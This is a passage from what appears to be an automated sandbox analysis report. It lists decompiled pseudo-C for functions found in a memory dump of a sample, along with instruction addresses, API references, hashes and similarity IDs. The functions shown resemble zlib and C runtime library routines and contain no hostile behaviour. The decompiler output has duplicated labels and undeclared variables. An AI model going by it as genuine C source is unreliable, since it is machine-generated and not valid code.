                                                                                                                                                  • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                  • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                  • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                  • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004057B0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

































                                                                                                                                                  0x004057b7
                                                                                                                                                  0x004057bf
                                                                                                                                                  0x004057c3
                                                                                                                                                  0x004057c5
                                                                                                                                                  0x004057cd
                                                                                                                                                  0x004059c8
                                                                                                                                                  0x004059ce
                                                                                                                                                  0x004057db
                                                                                                                                                  0x004057e3
                                                                                                                                                  0x004057e5
                                                                                                                                                  0x004057ea
                                                                                                                                                  0x00405921
                                                                                                                                                  0x0040592a
                                                                                                                                                  0x004057f0
                                                                                                                                                  0x004057f3
                                                                                                                                                  0x004057f6
                                                                                                                                                  0x004057f9
                                                                                                                                                  0x004057fc
                                                                                                                                                  0x004057ff
                                                                                                                                                  0x00405801
                                                                                                                                                  0x00405804
                                                                                                                                                  0x00405807
                                                                                                                                                  0x0040580a
                                                                                                                                                  0x0040580d
                                                                                                                                                  0x00405810
                                                                                                                                                  0x00405813
                                                                                                                                                  0x00405816
                                                                                                                                                  0x00405819
                                                                                                                                                  0x0040581c
                                                                                                                                                  0x00405824
                                                                                                                                                  0x00405827
                                                                                                                                                  0x0040582b
                                                                                                                                                  0x0040582e
                                                                                                                                                  0x00405831
                                                                                                                                                  0x00405834
                                                                                                                                                  0x00405837
                                                                                                                                                  0x00405837
                                                                                                                                                  0x00405839
                                                                                                                                                  0x0040583a
                                                                                                                                                  0x00405842
                                                                                                                                                  0x00405847
                                                                                                                                                  0x0040584a
                                                                                                                                                  0x0040584f
                                                                                                                                                  0x0040591c
                                                                                                                                                  0x0040591c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405855
                                                                                                                                                  0x00405855
                                                                                                                                                  0x00405859
                                                                                                                                                  0x0040585b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405870
                                                                                                                                                  0x00405872
                                                                                                                                                  0x00405874
                                                                                                                                                  0x00405874
                                                                                                                                                  0x00405877
                                                                                                                                                  0x0040587b
                                                                                                                                                  0x00405881
                                                                                                                                                  0x00405881
                                                                                                                                                  0x00405885
                                                                                                                                                  0x00405889
                                                                                                                                                  0x00405897
                                                                                                                                                  0x00405899
                                                                                                                                                  0x004058a5
                                                                                                                                                  0x004058a7
                                                                                                                                                  0x004058b3
                                                                                                                                                  0x004058b5
                                                                                                                                                  0x004058c1
                                                                                                                                                  0x004058c5
                                                                                                                                                  0x004058c7
                                                                                                                                                  0x004058c7
                                                                                                                                                  0x004058c8
                                                                                                                                                  0x004058b7
                                                                                                                                                  0x004058b7
                                                                                                                                                  0x004058b7
                                                                                                                                                  0x004058a9
                                                                                                                                                  0x004058a9
                                                                                                                                                  0x004058a9
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x0040588f
                                                                                                                                                  0x00405892
                                                                                                                                                  0x00405892
                                                                                                                                                  0x004058cc
                                                                                                                                                  0x004058cf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058d1
                                                                                                                                                  0x004058d9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058db
                                                                                                                                                  0x004058db
                                                                                                                                                  0x004058e0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058e2
                                                                                                                                                  0x004058e4
                                                                                                                                                  0x00405930
                                                                                                                                                  0x0040593f
                                                                                                                                                  0x00405942
                                                                                                                                                  0x00405944
                                                                                                                                                  0x00405949
                                                                                                                                                  0x0040594c
                                                                                                                                                  0x0040594e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405950
                                                                                                                                                  0x00405950
                                                                                                                                                  0x00405953
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405953
                                                                                                                                                  0x004058e6
                                                                                                                                                  0x004058ea
                                                                                                                                                  0x004058ec
                                                                                                                                                  0x004058f1
                                                                                                                                                  0x004058f2
                                                                                                                                                  0x004058f4
                                                                                                                                                  0x004058f6
                                                                                                                                                  0x004058f8
                                                                                                                                                  0x004058f9
                                                                                                                                                  0x00405904
                                                                                                                                                  0x00405906
                                                                                                                                                  0x0040590b
                                                                                                                                                  0x0040590e
                                                                                                                                                  0x00405911
                                                                                                                                                  0x00405916
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405955
                                                                                                                                                  0x00405955
                                                                                                                                                  0x00405955
                                                                                                                                                  0x00405961
                                                                                                                                                  0x00405963
                                                                                                                                                  0x00405967
                                                                                                                                                  0x0040596d
                                                                                                                                                  0x0040596e
                                                                                                                                                  0x0040597c
                                                                                                                                                  0x0040597d
                                                                                                                                                  0x00405970
                                                                                                                                                  0x00405970
                                                                                                                                                  0x00405974
                                                                                                                                                  0x00405975
                                                                                                                                                  0x00405975
                                                                                                                                                  0x00405985
                                                                                                                                                  0x00405988
                                                                                                                                                  0x0040598a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040598c
                                                                                                                                                  0x0040598c
                                                                                                                                                  0x00405990
                                                                                                                                                  0x004059a5
                                                                                                                                                  0x004059ad
                                                                                                                                                  0x004059b6
                                                                                                                                                  0x004059b6
                                                                                                                                                  0x004059b9
                                                                                                                                                  0x004059c5
                                                                                                                                                  0x00405992
                                                                                                                                                  0x00405992
                                                                                                                                                  0x004059a2
                                                                                                                                                  0x004059a2
                                                                                                                                                  0x00405990
                                                                                                                                                  0x0040598a
                                                                                                                                                  0x00405916
                                                                                                                                                  0x004058e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405860
                                                                                                                                                  0x00405860
                                                                                                                                                  0x00405862
                                                                                                                                                  0x00405864
                                                                                                                                                  0x00405865
                                                                                                                                                  0x00405868
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040586a
                                                                                                                                                  0x0040586a
                                                                                                                                                  0x0040586d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405868
                                                                                                                                                  0x0040584f
                                                                                                                                                  0x004057ea
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                    • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                    • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                    • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                  • _malloc.LIBCMT ref: 00405842
                                                                                                                                                  • _malloc.LIBCMT ref: 00405906
                                                                                                                                                  • _malloc.LIBCMT ref: 00405930
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _malloc$AllocateHeap
                                                                                                                                                  • String ID: 1.2.3
                                                                                                                                                  • API String ID: 680241177-2310465506
                                                                                                                                                  • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                  • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                  • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                  • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040BCC2, Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                  			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                                                                                                                                  0x0040bcc2
                                                                                                                                                  0x0040bcca
                                                                                                                                                  0x0040bcce
                                                                                                                                                  0x0040bcd3
                                                                                                                                                  0x0040bcd5
                                                                                                                                                  0x0040bcd8
                                                                                                                                                  0x0040bcde
                                                                                                                                                  0x0040bd01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bce5
                                                                                                                                                  0x0040bce5
                                                                                                                                                  0x0040bce7
                                                                                                                                                  0x0040bd08
                                                                                                                                                  0x0040bd0b
                                                                                                                                                  0x0040bd0d
                                                                                                                                                  0x0040bd1c
                                                                                                                                                  0x0040bd1c
                                                                                                                                                  0x0040bd1f
                                                                                                                                                  0x0040bd24
                                                                                                                                                  0x0040bd29
                                                                                                                                                  0x0040bd29
                                                                                                                                                  0x0040bd2c
                                                                                                                                                  0x0040bd2e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd30
                                                                                                                                                  0x0040bd30
                                                                                                                                                  0x0040bd35
                                                                                                                                                  0x0040bd38
                                                                                                                                                  0x0040bd3b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd3d
                                                                                                                                                  0x0040bd40
                                                                                                                                                  0x0040bd44
                                                                                                                                                  0x0040bd4b
                                                                                                                                                  0x0040bd4e
                                                                                                                                                  0x0040bd50
                                                                                                                                                  0x0040bd5a
                                                                                                                                                  0x0040bd52
                                                                                                                                                  0x0040bd55
                                                                                                                                                  0x0040bd55
                                                                                                                                                  0x0040bd61
                                                                                                                                                  0x0040bd63
                                                                                                                                                  0x0040be53
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd69
                                                                                                                                                  0x0040bd69
                                                                                                                                                  0x0040bd69
                                                                                                                                                  0x0040bd70
                                                                                                                                                  0x0040bdb6
                                                                                                                                                  0x0040bdb6
                                                                                                                                                  0x0040bdb9
                                                                                                                                                  0x0040be24
                                                                                                                                                  0x0040be2a
                                                                                                                                                  0x0040be2d
                                                                                                                                                  0x0040beb8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bebe
                                                                                                                                                  0x0040be33
                                                                                                                                                  0x0040be37
                                                                                                                                                  0x0040be87
                                                                                                                                                  0x0040be87
                                                                                                                                                  0x0040be8b
                                                                                                                                                  0x0040be95
                                                                                                                                                  0x0040be9a
                                                                                                                                                  0x0040be9a
                                                                                                                                                  0x0040bea2
                                                                                                                                                  0x0040beaa
                                                                                                                                                  0x0040beab
                                                                                                                                                  0x0040beac
                                                                                                                                                  0x0040bead
                                                                                                                                                  0x0040beae
                                                                                                                                                  0x0040bcf9
                                                                                                                                                  0x0040bcf9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bcfe
                                                                                                                                                  0x0040be39
                                                                                                                                                  0x0040be3c
                                                                                                                                                  0x0040be3f
                                                                                                                                                  0x0040be44
                                                                                                                                                  0x0040be45
                                                                                                                                                  0x0040be45
                                                                                                                                                  0x0040be45
                                                                                                                                                  0x0040be48
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be48
                                                                                                                                                  0x0040bdbb
                                                                                                                                                  0x0040bdbf
                                                                                                                                                  0x0040bde0
                                                                                                                                                  0x0040bde5
                                                                                                                                                  0x0040bde7
                                                                                                                                                  0x0040bde9
                                                                                                                                                  0x0040bde9
                                                                                                                                                  0x0040bdc1
                                                                                                                                                  0x0040bdc8
                                                                                                                                                  0x0040bdca
                                                                                                                                                  0x0040bdd7
                                                                                                                                                  0x0040bdd7
                                                                                                                                                  0x0040bdd7
                                                                                                                                                  0x0040bdda
                                                                                                                                                  0x0040bdcc
                                                                                                                                                  0x0040bdce
                                                                                                                                                  0x0040bdd1
                                                                                                                                                  0x0040bdd1
                                                                                                                                                  0x0040bddc
                                                                                                                                                  0x0040bddc
                                                                                                                                                  0x0040bdeb
                                                                                                                                                  0x0040bdee
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdf4
                                                                                                                                                  0x0040bdf4
                                                                                                                                                  0x0040bdf5
                                                                                                                                                  0x0040bdf9
                                                                                                                                                  0x0040bdfe
                                                                                                                                                  0x0040bdff
                                                                                                                                                  0x0040be00
                                                                                                                                                  0x0040be05
                                                                                                                                                  0x0040be08
                                                                                                                                                  0x0040be0a
                                                                                                                                                  0x0040bec6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bec6
                                                                                                                                                  0x0040be10
                                                                                                                                                  0x0040be13
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040beb4
                                                                                                                                                  0x0040be19
                                                                                                                                                  0x0040be1c
                                                                                                                                                  0x0040be1e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be1e
                                                                                                                                                  0x0040bdee
                                                                                                                                                  0x0040bd72
                                                                                                                                                  0x0040bd75
                                                                                                                                                  0x0040bd77
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd79
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd7f
                                                                                                                                                  0x0040bd81
                                                                                                                                                  0x0040bd83
                                                                                                                                                  0x0040bd85
                                                                                                                                                  0x0040bd85
                                                                                                                                                  0x0040bd87
                                                                                                                                                  0x0040bd8a
                                                                                                                                                  0x0040be5b
                                                                                                                                                  0x0040be5d
                                                                                                                                                  0x0040be61
                                                                                                                                                  0x0040be6a
                                                                                                                                                  0x0040be6f
                                                                                                                                                  0x0040be6f
                                                                                                                                                  0x0040be72
                                                                                                                                                  0x0040be77
                                                                                                                                                  0x0040be78
                                                                                                                                                  0x0040be79
                                                                                                                                                  0x0040be7a
                                                                                                                                                  0x0040be7b
                                                                                                                                                  0x0040be81
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd90
                                                                                                                                                  0x0040bd99
                                                                                                                                                  0x0040bd9e
                                                                                                                                                  0x0040bda1
                                                                                                                                                  0x0040bda3
                                                                                                                                                  0x0040bda6
                                                                                                                                                  0x0040bda8
                                                                                                                                                  0x0040bdab
                                                                                                                                                  0x0040bdae
                                                                                                                                                  0x0040bdae
                                                                                                                                                  0x0040be4b
                                                                                                                                                  0x0040be4b
                                                                                                                                                  0x0040be4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd69
                                                                                                                                                  0x0040bd63
                                                                                                                                                  0x0040bd2e
                                                                                                                                                  0x0040bd0f
                                                                                                                                                  0x0040bd14
                                                                                                                                                  0x0040bd14
                                                                                                                                                  0x0040bd17
                                                                                                                                                  0x0040bd1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bd1a
                                                                                                                                                  0x0040bce9
                                                                                                                                                  0x0040bce9
                                                                                                                                                  0x0040bcee
                                                                                                                                                  0x0040bcef
                                                                                                                                                  0x0040bcf0
                                                                                                                                                  0x0040bcf1
                                                                                                                                                  0x0040bcf2
                                                                                                                                                  0x0040bcf8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bcf8

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3886058894-0
                                                                                                                                                  • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                  • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                  • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                  • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00414738, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                  			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
